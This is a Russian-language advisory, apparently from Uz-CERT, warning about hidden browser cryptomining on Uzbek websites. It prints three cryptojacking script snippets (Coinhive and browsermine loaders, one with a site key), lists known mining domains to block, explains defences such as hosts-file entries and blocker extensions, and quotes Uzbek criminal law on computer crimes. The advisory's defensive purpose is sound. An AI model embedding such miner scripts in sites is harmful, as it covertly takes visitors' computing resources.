Актуально о майнинге в Узбекистане

27.02.2018 Саидакбар Садиков
Информация размещается ввиду участившегося числа обращений в адрес Uz-CERT о веб-сайтах доменной зоны "UZ", на которых запущен скрытый "браузерный майнинг"
Информация о защите персональных компьютеров от неправомерного использования в работе глобальных вычислительных сетей по подтверждению транзакций в блокчейне (майнинге)

Принцип «браузерного майнинга» основан на внедрении в файлы веб-сайта (веб-хостинга) javascript-сценариев или сценариев на других языках ООП, направленных на использование сетевых и иных ресурсов пользовательских рабочих станций (компьютеров, мобильных устройств и т.д.) для работы в глобальных вычислительных сетях для расчета хеш-сумм и кодов и последующих блокчейн-транзакций. Более подробная информация о браузерном майнинге доступна в глобальной сети Интернет.


Нами проведено изучение ряда веб-сайтов доменной зоны "UZ" (названия не приводятся), у которых в исходном коде страниц обнаружены доказательства размещения скриптов-майнеров:
ПРИМЕР 1
<script async="async" src="//browsermine.com/browsermine.js?u=759562&p=50"></script>

ПРИМЕР 2
<script src="https://coinhive.com/lib/coinhive.min.js"></script>

ПРИМЕР 3
<script>
   var miner = new CoinHive.Anonymous ('AOwNYbVwSP8KKOPwDsJaqVbNeAmORbsi');
   miner.start ();
</script>
Эти примеры могут быть использованы пользователями для самостоятельного выявления подобных веб-майнеров на веб-сайтах, которые они посещают

Ниже представлена информация о веб-сайтах, известных наличием в файлах веб-хостинга средств для майнинга:
  • azvjudwr.info
  • cnhv.co
  • coin-hive.com
  • gus.host
  • jroqvbvw.info
  • jsecoin.com
  • jyhfuqoh.info
  • kdowqlpt.info
  • listat.biz
  • lmodr.biz
  • mataharirama.xyz
  • minecrunch.co
  • minemytraffic.com
  • miner.pr0gramm.com
  • reasedoper.pw
  • xbasfbno.info

(информация актуальная на состояние 2017 года, полный список доменных имен, использующих «майнер»-скрипты, установить не представляется возможным)

Для защиты компьютеров от угроз несанкционированного использования ресурсов в глобальных вычислительных сетях по подтверждению транзакций в блокчейне (майнинге) необходимо:


Вариант 1
Редактирование файла «hosts». Необходимо добавить домены майнинга в файл "hosts". Для наглядности, приводится пример добавления доменного имени «coin-hive.com».
  • 1. Откройте проводник или другой файловый менеджер и перейдите в папку: C: \ Windows \ System32 \ drivers \ etc
  • 2. Откройте файл hosts в текстовом редакторе, например «Блокнот». Добавьте строку 0.0.0.0 coin-hive.com в конец документа.
  • 3. Сохраните документ.
Эта процедура блокирует запросы на домен «coin-hive.com»

Вариант 2
Блокировка браузерного майнинга с помощью «Anti-WebMiner»

Вариант 3
Защита с помощью отключения JavaScript. Необходимо отключить выполнение «javascript»-скриптов на веб-сайтах. Это может быть проблематично, так как сайтам для правильной работы может потребоваться загрузка некоторых «javascript»-скриптов (отображение информеров, динамический контент и др.).

Вариант 4
Защита от майнинга с помощью дополнений «NoCoin», «MinerBlock», «AdBlock» и «UBlock». Необходимые ссылки доступны в глобальной сети Интернет.

Важно!!! Информация о возможности уголовного преследования за правонарушения в области информационных технологий
Уголовным кодексом Республики Узбекистан предусмотрена следующая ответственность за правонарушения в области информационных технологий

Статья 278-1. Нарушение правил информатизации
Нарушение правил информатизации, то есть создание, внедрение и эксплуатация информационных систем, баз и банков данных, систем обработки и передачи информации, санкционированный доступ в информационные системы без принятия установленных мер защиты, причинившее крупный ущерб либо существенный вред правам или охраняемым законом интересам граждан либо государственным или общественным интересам, -
наказывается штрафом до пятидесяти минимальных размеров заработной платы или исправительными работами до одного года.
Те же действия, совершенные с причинением особо крупного ущерба, -
наказываются штрафом от пятидесяти до ста минимальных размеров заработной платы или исправительными работами от одного года до двух лет либо арестом до шести месяцев.

Статья 278-2. Незаконный (несанкционированный) доступ к компьютерной информации
Незаконный (несанкционированный) доступ к компьютерной информации, то есть информации в информационно-вычислительных системах, сетях и их составных частях, если это действие повлекло уничтожение, блокирование, модификацию, копирование либо перехват информации, нарушение работы электронно-вычислительных машин, системы электронно-вычислительных машин или их сети, -
наказывается штрафом до ста минимальных размеров заработной платы или лишением определенного права до трех лет либо исправительными работами до одного года.
...

Статья 278-3. Изготовление с целью сбыта либо сбыт и распространение специальных средств для получения незаконного (несанкционированного) доступа к компьютерной системе
Изготовление с целью сбыта либо сбыт и распространение специальных программных или аппаратных средств для получения незаконного (несанкционированного) доступа к защищенной компьютерной системе - наказывается штрафом до двухсот минимальных размеров заработной платы или исправительными работами до одного года.

Статья 278-4. Модификация компьютерной информации
Модификация компьютерной информации, то есть незаконное изменение, повреждение, стирание информации, хранящейся в компьютерной системе, а равно внесение в нее заведомо ложной информации, причинившее крупный ущерб либо существенный вред правам или охраняемым законом интересам граждан либо государственным или общественным интересам, -
наказывается штрафом до ста минимальных размеров заработной платы или исправительными работами до одного года или ограничением свободы до двух лет либо лишением свободы до двух лет.
...

Статья 278-5. Компьютерный саботаж
Умышленный вывод из строя чужого или служебного компьютерного оборудования, а равно разрушение компьютерной системы (компьютерный саботаж) -
наказывается штрафом от трехсот до четырехсот минимальных размеров заработной платы с лишением определенного права до трех лет или ограничением свободы до двух лет либо лишением свободы до двух лет.
...

Статья 278-6. Создание, использование или распространение вредоносных программ
Создание компьютерных программ или внесение изменений в существующие программы с целью несанкционированного уничтожения, блокирования, модификации, копирования или перехвата информации, хранящейся или передаваемой в компьютерной системе, а равно разработка специальных вирусных программ, их умышленное использование или распространение -
наказывается штрафом от ста до трехсот минимальных размеров заработной платы или ограничением свободы до двух лет либо лишением свободы до двух лет.
...